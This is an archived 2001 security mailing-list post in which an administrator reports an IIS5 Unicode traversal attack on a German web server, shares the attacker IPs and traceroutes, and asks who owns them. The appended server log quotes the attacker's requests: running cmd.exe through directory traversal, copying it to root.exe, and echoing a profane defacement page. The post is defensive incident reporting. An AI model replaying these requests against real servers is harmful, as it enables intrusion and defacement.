who's owning this ip?

From: Thomas Springer (tuevat_private)
Date: Tue May 08 2001 - 09:07:34 PDT

Next message: Shaun Dewberry: "Re: homepage worm"

Previous message: Arthur Donkers: "Slow scan from China ?"
Next in thread: Matt Rowley: "RE: who's owning this ip?"
Reply: Matt Rowley: "RE: who's owning this ip?"
Reply: McCammon, Keith: "RE: who's owning this ip?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

We had an attacker exploiting unicode on iis5 yesterday - see funny
chinese-war-pages in the log below. The hacker successfully exploited
IIS-Unicode bug, created ~100 files but was still too dumb to deface the
webserver.

The attacker used 208.22.161.15 and 202.97.205.3.
I tried a trace but ended up with
 ...
 19   210 ms   211 ms   220 ms  pao1-sjc2-oc48-2.pao1.above.net [
 20   210 ms   231 ms   230 ms  208.184.129.244.cmnetcom.com.hk [
 21   200 ms   211 ms   220 ms  202.0.170.34
 22   361 ms   370 ms   411 ms  202.0.170.13
 23   370 ms   391 ms   400 ms  202.97.10.193
 24   521 ms   541 ms   551 ms  202.97.10.66
 25   581 ms   601 ms   581 ms  61.138.38.2
 26   721 ms   711 ms   671 ms  61.180.139.202
 27   341 ms   350 ms   351 ms  202.97.205.3

208.22.161.15 seems to end at
17   130 ms   130 ms   131 ms  ewr-core-02.inet.qwest.net [205.171.17.130]
18   110 ms   110 ms   111 ms  ewr-brdr-01.inet.qwest.net [205.171.17.82]
19     *        *        *     Timeout..
....

Any chances to find out, to whom the two ip-adresses belong?
Any tool that copies cmd.exe to root.exe?

I liked this hack, because nothing happend and people her suddenly develop
security-awareness. hence, even the servers i begged to secure for weeks
are patched now.
BTW it's a german website - nothing to do with an chinese-american spy-wars.

funny hackerworld...

thomas

--- IIS-Logsnip ---
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 856 70 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>
^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%
3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<f
ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22
^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</html^>>.././i
ndex.asp 502 355 423 - - -
2001-05-07 12:28:55 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>
^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%
3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<f
ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22
^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</html^>>.././i
ndex.htm 502 355 423 - - -


Thomas Springer

Next message: Shaun Dewberry: "Re: homepage worm"
Previous message: Arthur Donkers: "Slow scan from China ?"
Next in thread: Matt Rowley: "RE: who's owning this ip?"
Reply: Matt Rowley: "RE: who's owning this ip?"
Reply: McCammon, Keith: "RE: who's owning this ip?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu May 10 2001 - 18:54:07 PDT